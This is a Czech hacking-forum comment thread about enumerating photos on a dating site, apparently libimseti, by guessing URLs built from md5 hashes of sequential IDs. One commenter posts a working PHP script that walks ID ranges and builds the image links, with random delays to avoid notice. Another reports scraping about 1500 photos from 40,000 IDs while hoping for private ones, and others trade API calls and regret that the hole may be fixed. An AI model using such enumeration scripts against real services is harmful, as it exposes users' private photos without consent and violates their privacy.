Zpět na seznam článků     Zpět na článek

Komentáře ke článku

 
 
 BBCode
AllBeer | 193.86.103.*10.7.2013 10:42
xchit.cz

Jestli se nepletu tak tam neresi jestli je fotka zaheslovana nebo ne. Muj skript neni nic prevratneho. Spis jestli by nekdo potvrdil moji domenku.
Id je cislo ziskane bruteforce na md5 hash v url primo dane fotky. Podle mne jsou zaheslovane fotky uzivatele ukladany ve stejne ciselne rade jako nezaheslovane.

<?php
$id = (int)$_GET["id"];
for ($i=$id; $i<$id+10; $i++) {
$md=md5($i);
$a=str_split($md);
$url='[link]'.$a[0].'/'.$a[1].'/'.$a[2].'/'.$md;
echo '<a href="'.$url.'.jpg"> <img src="'.$url.'-t.jpg" heigt=60 width=69> </a>';
usleep(rand(1000000,10000000));
}
?>
Cerberos | E-mail19.6.2013 15:31
Nechce se nekdo mrknout na podobnou vychytávku na rajce.net?
c0d3r19.6.2013 9:59
.cCuMiNn.: hehe, asi jo :)

----------
hack or be hacked :-) .. by greyhats
.cCuMiNn. | E-mail | Website | PGP18.6.2013 19:33
c0d3r: jj, lide se po úniku fotografií před několika lety již zřejmě poučili :)

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
c0d3r18.6.2013 19:11
testnul jsem 40k ID a z toho cca 1500 fotek mi to stahlo.. ale zadnej perverz (soukrome) ... tak Vam nevim jeslti je to k necemu funkcni :)

----------
hack or be hacked :-) .. by greyhats
panther | 77.75.74.*18.6.2013 12:37
Stačí s epodívat do zdrojáků libimseti:
[link]
[link]
...
Tay | 78.108.106.*17.6.2013 1:23
tak fotky listuje [link] ale tam se pro zmenu kontroluje heslo
Tay | 78.108.106.*17.6.2013 0:40
jinak některé fotky mají atribut photoState:"deny", ale imho ho nemají všechny zamčené fotky
Tay | 78.108.106.*17.6.2013 0:36
Našli jste nějaký další příkazy do API? Třeba vylistování fotek z alba?
jkjjljkljlkkj | 81.201.62.*15.6.2013 18:28
super že na to upozormujete, teď to fixnou :-(

Stránky: 1 2
© 2003–2024 SOOM.cz | ISSN 1804-7270 | info@soom.cz | IRC #soom | changelog | Mjg4Z